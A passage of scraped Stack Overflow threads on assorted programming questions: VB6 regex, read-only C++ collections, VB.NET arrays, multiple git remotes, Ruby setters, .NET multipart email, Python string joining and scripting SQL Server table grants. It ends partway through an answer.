Q: Regex in VB6? I need to write a program that can sift through specially-formatted text files (essentially CSV files with a fixed set of column types that have different delimiters for some columns ... comma in most places, colons in others) to search for formatting errors. I figure regular expressions will be the way to go.
The question: Is there a good regex library for VB6?
Thank you!
Edit: Holy crap, 3 responses in under an hour. Thanks a ton, folks! I've heard such good things about Regex Buddy from Jeff's postings / podcasting, that I will have to take a look.
A: Use the Regex COM component built into Windows. You can find a step by step on referencing and using it in your project at: http://www.regular-expressions.info/vb.html
A: Regex Buddy has a VB6 library
I use this in Delphi and it's very good - and Jeff has raved about RegexBuddy on several occasions.
I can't speak for the VB implementation, but it's certainly worth a look.
A: As you probably know, VB6 didn't ship with a built-in regular expression library. You can, however, use one provided by an ActiveX or COM library. See this article for details.
A: Other answers are correct, but link-only answers, so for convenience:
In Project → References, add the "Microsoft VBScript Regular Expressions 5.5" library:
Now you can use the library in your code:
Dim matcher As RegExp
Set matcher = New RegExp
matcher.Pattern = "^super cool string$"
If matcher.Test(someString) Then
'...do something...
End If
As usual, regular-expressions.info provides the best reference material.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44660",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: dotNetNuke/Moodle integration anyone out there have a moodle module for dotnetnuke, or some kind of integration setup that at least allows SSO?
A: This webpage provides details on how to implement Single Sign-on between DotNetNuke and Moodle.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44692",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Efficient alternatives for exposing a Collection In C++, what alternatives do I have for exposing a collection, from the point of view of performance and data integrity?
My problem is that I want to return an internal list of data to the caller, but I don't want to generate a copy. That leaves me with either returning a reference to the list, or a pointer to the list. However, I'm not crazy about letting the caller change the data; I just want to let it read the data.
*
*Do I have to choose between performance and data integrity?
*If so, is it in general better to go one way, or is it particular to the case?
*Are there other alternatives?
A: Many times the caller wants access just to iterate over the collection. Take a page out of Ruby's book and make the iteration a private aspect of your class.
#include <algorithm>
#include <functional>
#include <vector>
class Blah
{
public:
    void for_each_data(const std::function<void(const mydata&)>& f) const
    {
        std::for_each(myPreciousData.begin(), myPreciousData.end(), f);
    }
private:
    typedef std::vector<mydata> mydata_collection;
    mydata_collection myPreciousData;
};
With this approach you're not exposing anything about your internals, i.e. that you even have a collection.
A: RichQ's answer is a reasonable technique, if you're using an array, vector, etc.
If you're using a collection that isn't indexed by ordinal values... or think you might need to at some point in the near future... then you might want to consider exposing your own iterator type(s), and associated begin()/end() methods:
class Blah
{
public:
    typedef std::vector<mydata> mydata_collection;
    typedef mydata_collection::const_iterator mydata_const_iterator;
    // ...
    mydata_const_iterator data_begin() const
    { return myPreciousData.begin(); }
    mydata_const_iterator data_end() const
    { return myPreciousData.end(); }
private:
    mydata_collection myPreciousData;
};
...which you can then use in the normal fashion:
Blah blah;
for (Blah::mydata_const_iterator itr = blah.data_begin();
     itr != blah.data_end();
     ++itr)
{
    // ...
}
A: Maybe something like this?
const std::vector<mydata>& getData() const
{
    return _myPrivateData;
}
The benefit here is that it's very, very simple, and as safe as you get in C++. You can cast the const away, as RichQ suggests, but there's nothing you can do to prevent someone from doing that if you're not copying. Here, they would have to use const_cast, which is pretty easy to spot if you're looking for it.
Iterators, alternatively, might get you pretty much the same thing, but it's more complicated. The only added benefit of using iterators here (that I can think of) is that you can have better encapsulation.
A: Use of a const reference or shared pointer will only help if the contents of the underlying collection do not change over time.
Consider your design. Does the caller really need to see the internal array? Can you restructure the code so that the caller tells object what to do with the array? E.g., if the caller intends to search the array, could the owner object do it?
You could pass a reference to a result vector into the function. On some compilers that may result in marginally faster code.
I would recommend trying to redesign first, going with a clean solution second, optimizing for performance third (if necessary).
A: One advantage of both @Shog9's and @RichQ's solutions is that they de-couple the client from the collection implementation.
If you decide to change your collection type to something else, your clients will still work.
A: What you want is read-only access without copying the entire blob of data. You have a couple options.
Firstly, you could just return a const reference to whatever your data container is, as suggested above:
const std::vector<T>& getData() { return mData; }
This has the disadvantage of concreteness: you can't change how you store the data internally without changing the interface of your class.
Secondly, you can return const-ed pointers to the actual data:
const T* getDataAt(size_t index)
{
    return &mData[index];
}
This is a bit nicer, but also requires that you provide a getNumItems call, and protect against out-of-bounds indices. Also, the const-ness of your pointers is easily cast away, and your data is now read-write.
Another option is to provide a pair of iterators, which is a bit more complex. This has the same advantages as pointers, as well as not (necessarily) needing to provide a getNumItems call, and there's considerably more work involved for a caller to strip the iterators of their const-ness.
Probably the easiest way to manage this is by using a Boost Range:
typedef typename std::vector<T>::const_iterator range_iterator_type;
boost::iterator_range<range_iterator_type> getDataRange() const
{
    return boost::iterator_range<range_iterator_type>(mData.begin(), mData.end());
}
This has the advantages of ranges being composable, filterable, etc, as you can see on the website.
A: Using const is a reasonable choice.
You may also wish to check out the Boost C++ libraries for their shared pointer implementation. It provides the advantages of pointers; e.g., you may have a requirement to return a shared pointer to "null", which a reference would not allow.
http://www.boost.org/doc/libs/1_36_0/libs/smart_ptr/smart_ptr.htm
In your case you would make the shared pointer's type const to prohibit writes.
A: If you have a std::list of plain old data (what .NET would call 'value types'), then returning a const reference to that list will be fine (ignoring evil things like const_cast)
If you have a std::list of pointers (or boost::shared_ptr's) then that will only stop you modifying the collection, not the items in the collection. My C++ is too rusty to be able to tell you the answer to that at this point :-(
A: The following two articles elaborate on some of the issues involved in, and the need for, encapsulating container classes. Although they do not provide a complete worked solution, they essentially lead to the same approach as given by Shog9.
Part 1: Encapsulation and Vampires
Part 2 (free registration is now required to read this): Train Wreck Spotting
by Kevlin Henney
A: I suggest using callbacks along the lines of EnumChildWindows. You will have to find some means to prevent the user from changing your data. Maybe use a const pointer/reference.
On the other hand, you could pass a copy of each element to the callback function overwriting the copy each time. (You do not want to generate a copy of your entire collection. I am only suggesting making a copy one element at a time. That shouldn't take much time/memory).
MyClass tmp;
for (int i = 0; i < n; i++) {
    tmp = elements[i];
    callback(tmp);
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44693",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: VB.NET Empty String Array How can I create an empty one-dimensional string array?
A: The array you created by Dim s(0) As String IS NOT EMPTY
In VB.Net, the subscript you use in the array declaration is the index of the last element. VB.Net by default starts indexing at 0, so you have an array that already has one element.
You should instead try using System.Collections.Specialized.StringCollection or (even better) System.Collections.Generic.List(Of String). They amount to pretty much the same thing as an array of string, except they're loads better for adding and removing items. And let's be honest: you'll rarely create an empty string array without wanting to add at least one element to it.
If you really want an empty string array, declare it like this:
Dim s As String()
or
Dim t() As String
A: Something like:
Dim myArray(9) as String
Would give you an array of 10 String references (each pointing to Nothing).
If you're not sure of the size at declaration time, you can declare a String array like this:
Dim myArray() as String
And then you can point it at a properly-sized array of Strings later:
ReDim myArray(9) as String
ZombieSheep is right about using a List if you don't know the total size and you need to dynamically populate it. In VB.NET that would be:
Dim myList as New List(Of String)
myList.Add("foo")
myList.Add("bar")
And then to get an array from that List:
myList.ToArray()
@Mark
Thanks for the correction.
A: You don't have to include String twice, and you don't have to use New.
Either of the following will work...
Dim strings() as String = {}
Dim strings as String() = {}
A: VB is 0-indexed in array declarations, so something like Dim myArray(10) as String gives you 11 elements. It's a common mistake when translating from C languages.
So, for an empty array, either of the following would work:
Dim str(-1) as String ' -1 + 1 = 0, so this has 0 elements
Dim str() as String = New String() { } ' implicit size, initialized to empty
A: Dim strEmpty(-1) As String
A: Another way of doing this:
Dim strings() As String = {}
Testing that it is an empty string array:
MessageBox.Show("count: " + strings.Count.ToString)
Will show a message box saying "count: 0".
A: A little verbose, but self documenting...
Dim strEmpty() As String = Enumerable.Empty(Of String).ToArray
A: Not sure why you'd want to, but the C# way would be
string[] newArray = new string[0];
I'm guessing that VB won't be too dissimilar to this.
If you're building an empty array so you can populate it with values later, you really should consider using
List<string>
and converting it to an array (if you really need it as an array) with
newListOfString.ToArray();
A: Dim array As String() = Array.Empty(Of String)
A: Try this:
Dim Arraystr() As String = {}
A: I know this is an old thread, but another way to create an empty one-dimensional string array is to use the Array.Empty<T> method.
E.g.,
VB.NET
Dim emptyStringArray() As String = Array.Empty(Of String)()
C#
string[] emptyStringArray = Array.Empty<string>()
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: How to have two remote origins for Git? Our git server will be local, but we also want a server where our local repo is kept online, used only in a push-to fashion.
How can one do that?
A: You can add remotes with git remote add <name> <url>
You can then push to a remote with git push <name> master:master to push your local master branch to the remote master branch.
When you create a repo with git clone, the remote is named origin, but you can create a public repository for your online server and push to it with git push public master:master.
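For example (the repository URL here is a placeholder):
git remote add public ssh://git.example.com/srv/git/project.git
git push public master:master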
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44714",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Why do Ruby setters need "self." qualification within the class? Ruby setters—whether created by (c)attr_accessor or manually—seem to be the only methods that need self. qualification when accessed within the class itself. This seems to put Ruby alone in the world of languages:
*
*All methods need self/this (like Perl, and I think Javascript)
*No methods require self/this (C#, Java)
*Only setters need self/this (Ruby?)
The best comparison is C# vs Ruby, because both languages support accessor methods which work syntactically just like class instance variables: foo.x = y, y = foo.x . C# calls them properties.
Here's a simple example; the same program in Ruby then C#:
class A
def qwerty; @q; end # manual getter
def qwerty=(value); @q = value; end # manual setter, but attr_accessor is same
def asdf; self.qwerty = 4; end # "self." is necessary in ruby?
def xxx; asdf; end # we can invoke nonsetters w/o "self."
def dump; puts "qwerty = #{qwerty}"; end
end
a = A.new
a.xxx
a.dump
Take away the self. from self.qwerty = 4 and it fails (Ruby 1.8.6 on Linux & OS X). Now C#:
using System;
public class A {
    public A() {}
    int q;
    public int qwerty {
        get { return q; }
        set { q = value; }
    }
    public void asdf() { qwerty = 4; } // C# setters work w/o "this."
    public void xxx() { asdf(); } // are just like other methods
    public void dump() { Console.WriteLine("qwerty = {0}", qwerty); }
}
public class Test {
    public static void Main() {
        A a = new A();
        a.xxx();
        a.dump();
    }
}
Question: Is this true? Are there other occasions besides setters where self is necessary? I.e., are there other occasions where a Ruby method cannot be invoked without self?
There are certainly lots of cases where self becomes necessary. This is not unique to Ruby, just to be clear:
using System;
public class A {
    public A() {}
    public int test { get { return 4; }}
    public int useVariable() {
        int test = 5;
        return test;
    }
    public int useMethod() {
        int test = 5;
        return this.test;
    }
}
public class Test {
    public static void Main() {
        A a = new A();
        Console.WriteLine("{0}", a.useVariable()); // prints 5
        Console.WriteLine("{0}", a.useMethod()); // prints 4
    }
}
The same ambiguity is resolved in the same way. But, subtle though it is, I'm asking about the case where
*
*A method has been defined, and
*No local variable has been defined, and
we encounter
qwerty = 4
which is ambiguous—is this a method invocation or a new local variable assignment?
@Mike Stone
Hi! I understand and appreciate the points you've made and your
example was great. Believe me when I say, if I had enough reputation,
I'd vote up your response. Yet we still disagree:
*
*on a matter of semantics, and
*on a central point of fact
First I claim, not without irony, we're having a semantic debate about the
meaning of 'ambiguity'.
When it comes to parsing and programming language semantics (the subject
of this question), surely you would admit a broad spectrum of the notion
'ambiguity'. Let's just adopt some random notation:
*
*ambiguous: lexical ambiguity (lex must 'look ahead')
*Ambiguous: grammatical ambiguity (yacc must defer to parse-tree analysis)
*AMBIGUOUS: ambiguity knowing everything at the moment of execution
(and there's junk between 2-3 too). All these categories are resolved by
gathering more contextual info, looking more and more globally. So when you
say,
"qwerty = 4" is UNAMBIGUOUS in C#
when there is no variable defined...
I couldn't agree more. But by the same token, I'm saying
"qwerty = 4" is un-Ambiguous in ruby
(as it now exists)
"qwerty = 4" is Ambiguous in C#
And we're not yet contradicting each other. Finally, here's where we really
disagree: Either ruby could or could not be implemented without any further
language constructs such that,
For "qwerty = 4," ruby UNAMBIGUOUSLY
invokes an existing setter if there
is no local variable defined
You say no. I say yes; another ruby could exist which behaves exactly like
the current in every respect, except "qwerty = 4" defines a new
variable when no setter and no local exists, it invokes the setter if one
exists, and it assigns to the local if one exists. I fully accept that I
could be wrong. In fact, a reason why I might be wrong would be interesting.
Let me explain.
Imagine you are writing a new OO language with accessor methods looking
like instances vars (like ruby & C#). You'd probably start with
conceptual grammars something like:
var = expr // assignment
method = expr // setter method invocation
But the parser-compiler (not even the runtime) will puke, because even after
all the input is grokked there's no way to know which grammar is pertinent.
You're faced with a classic choice. I can't be sure of the details, but basically ruby does this:
basically ruby does this:
var = expr // assignment (new or existing)
// method = expr, disallow setter method invocation without .
that is why it's un-Ambiguous, while C# does this:
symbol = expr // push 'symbol=' onto parse tree and decide later
// if local variable is def'd somewhere in scope: assignment
// else if a setter is def'd in scope: invocation
For C#, 'later' is still at compile time.
I'm sure ruby could do the same, but 'later' would have to be at runtime, because
as ben points out you don't know until the statement is executed which case
applies.
My question was never intended to mean "do I really need the 'self.'?" or "what
potential ambiguity is being avoided?" Rather I wanted to know why was this
particular choice made? Maybe it's not performance. Maybe it just got the job
done, or it was considered best to always allow a 1-liner local to override a
method (a pretty rare case requirement) ...
But I'm sort of suggesting that the most dynamical language might be the one which
postpones this decision the longest, and chooses semantics based on the most contextual
info: so if you have no local and you defined a setter, it would use the setter. Isn't
this why we like ruby, smalltalk, objc, because method invocation is decided at runtime,
offering maximum expressiveness?
A: Well, I think the reason this is the case is because qwerty = 4 is ambiguous—are you defining a new variable called qwerty or calling the setter? Ruby resolves this ambiguity by saying it will create a new variable, thus the self. is required.
Here is another case where you need self.:
class A
  def test
    4
  end
  def use_variable
    test = 5
    test
  end
  def use_method
    test = 5
    self.test
  end
end
a = A.new
a.use_variable # returns 5
a.use_method # returns 4
As you can see, the access to test is ambiguous, so the self. is required.
Also, this is why the C# example is actually not a good comparison, because you define variables in a way that is unambiguous from using the setter. If you had defined a variable in C# that was the same name as the accessor, you would need to qualify calls to the accessor with this., just like the Ruby case.
A: The important thing to remember here is that Ruby methods can be (un)defined at any point, so to intelligently resolve the ambiguity, every assignment would need to run code to check whether there is a method with the assigned-to name at the time of assignment.
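A toy Ruby illustration of the check that would be needed at every assignment (hedged: this is the decision the interpreter would face, not how it actually resolves it):
if respond_to?(:qwerty=)
  self.qwerty = 4  # an existing setter wins
else
  qwerty = 4       # otherwise create a new local variable
end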
A: Because otherwise it would be impossible to set local variables at all inside of methods. variable = some_value is ambiguous. For example:
class ExampleClass
  attr_reader :last_set
  def method_missing(name, *args)
    if name.to_s =~ /=$/
      @last_set = args.first
    else
      super
    end
  end
  def some_method
    some_variable = 5 # Set a local variable? Or call method_missing?
    puts some_variable
  end
end
If self wasn't required for setters, some_method would raise NameError: undefined local variable or method 'some_variable'. As-is though, the method works as intended:
example = ExampleClass.new
example.blah = 'Some text'
example.last_set #=> "Some text"
example.some_method # prints "5"
example.last_set #=> "Some text"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44715",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "79"
} |
Q: Howto Enable Font Antialiasing in Windows I have downloaded a font that looks less than desirable if it is not anti-aliased. I can not figure out how to enable anti-aliasing in VS, I have changed the 'Smooth Edges of Screen Fonts' in the system performance options but that does not seem to help.
VS2008 on XP SP3.
What am I missing?
A: In Windows 7:
Control Panel | Display | Adjust ClearType text
This starts a 4-step calibration process.
A: Try using ClearType, not Standard font smoothing.
It's in Display properties, Appearance, Effects.
A: Could it be a problem with the color combination? Some fonts look really ugly on high contrast combinations with a black background.
Also, can you see the difference in the fonts in any other application?
Which font is it?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44721",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Is there a plugin for targetting .NET 1.1 with VS 2008? Is there a plugin for targetting .NET 1.1 with VS 2008?
A: From what I know, you can hack the build files to target the 1.1 runtime instead.
Google for your question and you should turn up pages like this one.
A: According to Scott Guthrie, the reason VS 2008 does not support 1.0 or 1.1...
"...is that there were significant CLR engine changes between .NET 1.x and 2.x that make debugging very difficult to support. In the end the costing of the work to support that was so large and impacted so many parts of Visual Studio that we weren't able to add 1.1 support in this release."
Sounds like it would be difficult to really create such a plugin. The only hope you might find in his statement is that they "weren't able to add 1.1 support in this release" (emphasis mine). i.e. maybe they will add it down the road.
I wouldn't hold my breath though.
EDIT: Looks like the link @lassevk provided shows some promise for those people that can't accept running VS 2003 side-by-side with VS 2008. Looks like a lot of work though. :)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44737",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How to cache ASP.NET user controls? I heard on a recent podcast (Polymorphic) that it is possible to cache a user control as opposed to the entire page.
I think my header control which displays static content and my footer control could benefit from being cached.
How can I go about caching just those controls?
A: Take a look here
You can use VaryByParam and VaryByControl in the output cache.
A: I think you can specify OutputCache in the control's markup file like you'd do on an ASPX page. And it'd get properly cached automatically.
Just read up on OutputCache page directive on MSDN and get the parameters right and it should do what you want it to.
It's been a long time since I wrote classic ASP.NET, but I believe that's how it's done.
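For example, at the top of the user control's .ascx file, a directive along these lines (the duration value is an arbitrary choice):
<%@ OutputCache Duration="3600" VaryByParam="None" %>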
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44757",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Eclipse "Share Project" by hand? What actually happens to the file system when you do a Subclipse Share Project on an Eclipse project that was externally checked out from Subversion? All the .svn folders are already in place. I get an error when I try to Share Project the right way, and I'd rather not delete and re-checkout the projects from the SVN Repository browser.
A: The Share Project action is intended to commit the first version of a project, i.e. one with no .svn metadata in place. It will get upset if it sees .svn directories already there. As Rob wrote, the way to get that checked-out project into Eclipse is to use the import capability.
A: Dunno exactly what happens within eclipse, I presume it does some funky stuff in the .metadata directory of the workspace. That said, I would recommend the following to get eclipse to learn about the svn settings of the project:
*
*Delete the project from the workspace (keep "Delete project contents on disk" unchecked)
*File > Import... > General > Existing Projects into Workspace
*Browse to the folder containing the original project(s) of interest
*Import the projects into your workspace
This seems to have the side effect of subclipse noticing the subversion settings when importing the "new" projects into your workspace.
A: I'm not sure what version of Eclipse you are using or whether this will apply since I'm using Subversive instead of Subclipse. When I use the share project feature to commit the project into svn when I already have all of the .svn directories in place, I get a choice of like "Use current project settings" and then eclipse automatically reattaches the project svn information to the team integration. You can screw it up if you try to enter different information.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44760",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Ajax Autocomplete Webservice Call - Service Method, am I calling this correctly? Ok, so my method in my webservice requires a type to be passed, it is called in the ServiceMethod property of the AutoCompleteExtender, I am fuzzy about how I should do that so I called it like this:
ServiceMethod="DropDownLoad<<%=(typeof)subCategory%>>"
where subCategory is a page property that looks like this:
protected SubCategory subCategory
{
    get
    {
        var subCategory = NHibernateObjectHelper.LoadDataObject<SubCategory>(Convert.ToInt32(Request.QueryString["SCID"]));
        return subCategory;
    }
}
A: You could use the AutoCompleteExtender's ContextKey parameter to use a single web method that accepted a type name as its context key. Then in the web method, use reflection and that parameter to return the desired string[].
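A hedged sketch of that idea (the method name follows the question; the reflection body is an assumption, not a tested implementation):
[WebMethod]
public string[] DropDownLoad(string prefixText, int count, string contextKey)
{
    // The extender passes its ContextKey value as the third parameter;
    // here it would carry a type name to resolve via reflection.
    Type itemType = Type.GetType(contextKey);
    // ... load items of itemType, filter by prefixText, take 'count' ...
    return new string[0];
}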
A: I don't think calling a Generic Method on a webservice is possible.
If you look at the service description of two identical methods, one generic, one not:
[WebMethod]
public string[] GetSearchList(string prefixText, int count)
{
}
[WebMethod]
public string[] GetSearchList2<T>(string prefixText, int count)
{
}
They are identical. It appears that both SOAP 1.x and HTTP POST do not allow this type of operation.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44771",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Sending a mail as both HTML and Plain Text in .net I'm sending mail from my C# Application, using the SmtpClient. Works great, but I have to decide if I want to send the mail as Plain Text or HTML. I wonder, is there a way to send both? I think that's called multipart.
I googled a bit, but most examples essentially did not use SmtpClient but composed the whole SMTP-Body themselves, which is a bit "scary", so I wonder if something is built in the .net Framework 3.0?
If not, is there any really well used/robust Third Party Library for sending e-Mails?
A: On top of using AlternateViews views to add both the html and the plain text view, make sure you are not also setting the body of the Mail Message object.
// do not do this:
var msg = new MailMessage(model.From, model.To);
msg.Body = compiledHtml;
As it will make your email contain the html content in both views, overriding the alternative views.
A: For the people (like me) who've had the problem of gmail displaying the plaintext part instead of the html part.
Gmail seems to always display the last part in your message.
So if you've added the html part before your plain text part chances are gmail will always show the plain text variant.
To fix this you can simply add the plain text part before your html part.
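In code, that ordering looks like this (htmlView follows the example below; plainView is the analogous plain-text AlternateView, assumed here):
msg.AlternateViews.Add(plainView); // plain-text fallback first
msg.AlternateViews.Add(htmlView);  // HTML part last, so clients prefer it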
A: The MSDN documentation seems to miss one thing, though: I had to set the content type manually. But otherwise, it works like a charm :-)
MailMessage msg = new MailMessage(username, nu.email, subject, body);
msg.BodyEncoding = Encoding.UTF8;
msg.SubjectEncoding = Encoding.UTF8;
AlternateView htmlView = AlternateView.CreateAlternateViewFromString(htmlContent);
htmlView.ContentType = new System.Net.Mime.ContentType("text/html");
msg.AlternateViews.Add(htmlView);
A: What you want to do is use the AlternateViews property on the MailMessage
http://msdn.microsoft.com/en-us/library/system.net.mail.mailmessage.alternateviews.aspx
A: Just want to add that you can use defined constants MediaTypeNames.Text.Html and MediaTypeNames.Text.Plain instead of "text/html" and "text/plain", which is always a preferable way. It's in System.Net.Mime namespace.
So in the example above, it would be:
AlternateView htmlView = AlternateView.CreateAlternateViewFromString(htmlContent, null, MediaTypeNames.Text.Html);
A: I'm just going to put a note here for anyone that's having problems and finds their way to this page - sometimes, Outlook SMTP servers will reconvert outgoing email. If you're seeing your plain-text body vanish entirely, and nothing but base64-encoded attachments, it might be because your server is reencoding the email. Google's SMTP server does not reencode email - try sending through there and see what happens.
A: For anyone who bumped into this issue you might want to check if you have preheader tags in your html.
In my html I've added a tag with a phrase of "Activate your client admin account by clicking the link.".
It seems like gmail was flagging the phrase "clicking the link"; after removing it, all my emails go straight to the inbox.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44777",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "52"
} |
Q: How would you make a comma-separated string from a list of strings? What would be your preferred way to concatenate strings from a sequence such that between every two consecutive pairs a comma is added. That is, how do you map, for instance, ['a', 'b', 'c'] to 'a,b,c'? (The cases ['s'] and [] should be mapped to 's' and '', respectively.)
I usually end up using something like ''.join(map(lambda x: x+',',l))[:-1], but it always feels somewhat unsatisfying.
A: Why the map/lambda magic? Doesn't this work?
>>> foo = ['a', 'b', 'c']
>>> print(','.join(foo))
a,b,c
>>> print(','.join([]))
>>> print(','.join(['a']))
a
In case there are numbers in the list, you could use a list comprehension:
>>> ','.join([str(x) for x in foo])
or a generator expression:
>>> ','.join(str(x) for x in foo)
A: l=['a', 1, 'b', 2]
print str(l)[1:-1]
Output: "'a', 1, 'b', 2"
A: @jmanning2k using a list comprehension has the downside of creating a new temporary list. The better solution would be using itertools.imap which returns an iterator
from itertools import imap
l = [1, "foo", 4 ,"bar"]
",".join(imap(str, l))
A: Here is an example with list
>>> myList = [['Apple'],['Orange']]
>>> myList = ','.join(map(str, [i[0] for i in myList]))
>>> print "Output:", myList
Output: Apple,Orange
More Accurate:-
>>> myList = [['Apple'],['Orange']]
>>> myList = ','.join(map(str, [type(i) == list and i[0] for i in myList]))
>>> print "Output:", myList
Output: Apple,Orange
Example 2:-
myList = ['Apple','Orange']
myList = ','.join(map(str, myList))
print "Output:", myList
Output: Apple,Orange
A: If you want to do the shortcut way :) :
','.join([str(word) for word in wordList])
But if you want to show off with logic :) :
wordList = ['USD', 'EUR', 'JPY', 'NZD', 'CHF', 'CAD']
stringText = ''
for word in wordList:
    stringText += word + ','
stringText = stringText[:-1]  # get rid of last comma
print(stringText)
A: ",".join(l) will not work for all cases. I'd suggest using the csv module with StringIO
import StringIO
import csv
l = ['list','of','["""crazy"quotes"and\'',123,'other things']
line = StringIO.StringIO()
writer = csv.writer(line)
writer.writerow(l)
csvcontent = line.getvalue()
# 'list,of,"[""""""crazy""quotes""and\'",123,other things\r\n'
A: Here is an alternative solution in Python 3.0 which allows non-string list items:
>>> alist = ['a', 1, (2, 'b')]
*
*a standard way
>>> ", ".join(map(str, alist))
"a, 1, (2, 'b')"
*the alternative solution
>>> import io
>>> s = io.StringIO()
>>> print(*alist, file=s, sep=', ', end='')
>>> s.getvalue()
"a, 1, (2, 'b')"
NOTE: The space after comma is intentional.
A: @Peter Hoffmann
Using generator expressions has the benefit of also producing an iterator but saves importing itertools. Furthermore, list comprehensions are generally preferred to map, thus, I'd expect generator expressions to be preferred to imap.
>>> l = [1, "foo", 4 ,"bar"]
>>> ",".join(str(bit) for bit in l)
'1,foo,4,bar'
A: Don't you just want:
",".join(l)
Obviously it gets more complicated if you need to quote/escape commas etc in the values. In that case I would suggest looking at the csv module in the standard library:
https://docs.python.org/library/csv.html
A: my_list = ['a', 'b', 'c', 'd']
my_string = ','.join(my_list)
'a,b,c,d'
This won't work if the list contains non-string types (such as integers, floats, bools, None). In that case, do:
my_string = ','.join(map(str, my_list))
A: >>> my_list = ['A', '', '', 'D', 'E',]
>>> ",".join([str(i) for i in my_list if i])
'A,D,E'
my_list may contain any type of variables. This avoids the result 'A,,,D,E'.
A: Unless I'm missing something, ','.join(foo) should do what you're asking for.
>>> ','.join([''])
''
>>> ','.join(['s'])
's'
>>> ','.join(['a','b','c'])
'a,b,c'
(edit: and as jmanning2k points out,
','.join([str(x) for x in foo])
is safer and quite Pythonic, though the resulting string will be difficult to parse if the elements can contain commas -- at that point, you need the full power of the csv module, as Douglas points out in his answer.)
A: I would say the csv library is the only sensible option here, as it was built to cope with all csv use cases such as commas in a string, etc.
To output a list l to a .csv file:
import csv
with open('some.csv', 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(l) # this will output l as a single row.
It is also possible to use writer.writerows(iterable) to output multiple rows to csv.
This example is compatible with Python 3, as the other answer here used StringIO which is Python 2.
A: Sometimes you also need this for a SQL IN clause:
l = ["foo", "baar", 6]
where_clause = "..... IN (" + ','.join([f"'{x}'" for x in l]) + ")"
>> "..... IN ('foo','baar','6')"
Enjoy!
A: My two cents. I like simple one-line code in Python:
>>> from itertools import imap, ifilter
>>> l = ['a', '', 'b', 1, None]
>>> ','.join(imap(str, ifilter(lambda x: x, l)))
a,b,1
>>> m = ['a', '', None]
>>> ','.join(imap(str, ifilter(lambda x: x, m)))
'a'
It's pythonic, works for strings, numbers, None and empty string. It's short and satisfies the requirements. If the list is not going to contain numbers, we can use this simpler variation:
>>> ','.join(ifilter(lambda x: x, l))
Also this solution doesn't create a new list, but uses an iterator, like @Peter Hoffmann pointed (thanks).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44778",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "671"
} |
Q: What's the best way to implement a SQL script that will grant permissions to a database role on all the user tables in a database? What's the best way to implement a SQL script that will grant select, references, insert, update, and delete permissions to a database role on all the user tables in a database?
Ideally, this script could be run multiple times, as new tables were added to the database. SQL Server Management Studio generates scripts for individual database objects, but I'm looking for more of a "fire-and-forget" script.
A: I'm sure there is an easier way, but you could loop through the sysobjects table in the database and grant permissions to any user table objects that exist. You could then run that multiple times whenever new tables are added.
A: Dr Zimmerman is on the right track here. I'd be looking to write a stored procedure that has a cursor looping through user objects, using dynamic EXECUTE to effect the grant. Something like this:
IF EXISTS (
SELECT 1 FROM sysobjects
WHERE name = 'sp_grantastic'
AND type = 'P'
)
DROP PROCEDURE sp_grantastic
GO
CREATE PROCEDURE sp_grantastic
AS
DECLARE
@object_name VARCHAR(30)
,@time VARCHAR(8)
,@rights VARCHAR(20)
,@role VARCHAR(20)
DECLARE c_objects CURSOR FOR
SELECT name
FROM sysobjects
WHERE type IN ('P', 'U', 'V')
FOR READ ONLY
BEGIN
SELECT @rights = 'ALL'
,@role = 'PUBLIC'
OPEN c_objects
WHILE (1=1)
BEGIN
FETCH c_objects INTO @object_name
IF @@SQLSTATUS <> 0 BREAK
SELECT @time = CONVERT(VARCHAR, GetDate(), 108)
PRINT '[%1!] hitting up object %2!', @time, @object_name
EXECUTE('GRANT '+ @rights +' ON '+ @object_name+' TO '+@role)
END
PRINT '[%1!] fin!', @time
CLOSE c_objects
DEALLOCATE CURSOR c_objects
END
GO
GRANT ALL ON sp_grantastic TO PUBLIC
GO
Then you can fire and forget:
EXEC sp_grantastic
A: There's an undocumented MS procedure called sp_MSforeachtable that you could use which is definitely in 2000 and 2005.
To grant select permissions the usage would be:
EXECUTE sp_MSforeachtable @command1=' Grant Select on ? to RoleName'
To grant the other permissions either have a new statement for each one or just add them to the command like this:
EXECUTE sp_MSforeachtable @command1=' Grant Select on ? to RoleName; Grant Delete on ? to RoleName;'
With a bit of playing around it might be possible to turn the role name into a parameter as well.
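For instance, a sketch of that parameterization (untested; it assumes the role name itself is trusted input):
DECLARE @role sysname
DECLARE @cmd nvarchar(2000)
SET @role = 'MyRole'  -- hypothetical role name
SET @cmd = 'GRANT SELECT, REFERENCES, INSERT, UPDATE, DELETE ON ? TO ' + @role
EXEC sp_MSforeachtable @command1 = @cmd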
A: We use something similar where I work, looping through all the tables, views, and stored procedures in the system.
CREATE PROCEDURE dbo.SP_GrantFullAccess
@username varchar(300)
AS
DECLARE @on varchar(300)
DECLARE @count int
SET @count = 0
